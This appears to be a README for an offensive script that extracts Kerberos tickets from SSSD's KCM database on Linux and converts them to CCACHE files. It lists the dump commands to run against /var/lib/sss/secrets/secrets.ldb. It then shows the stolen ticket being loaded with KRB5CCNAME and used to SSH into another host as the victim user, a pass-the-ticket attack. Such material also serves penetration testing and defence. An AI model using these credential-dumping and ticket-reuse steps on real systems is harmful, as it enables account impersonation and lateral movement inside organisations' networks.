Quick script to dump the KCM database used by SSSD and recover Kerberos tickets in the CCACHE format.
Initially based on SSSDKCMExtractor and KCMTicketFormatter.
Since version 2.0.0 (2018-08-13), the back end storage of the KCM responder of SSSD does not encrypt the database content anymore. It however still relies on an LDB database (itself based on TDB), which makes it easily searchable using LDAP-like queries.
SSSD uses a custom storage format for Kerberos tickets, which can be converted to standard CCACHE files using this script.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local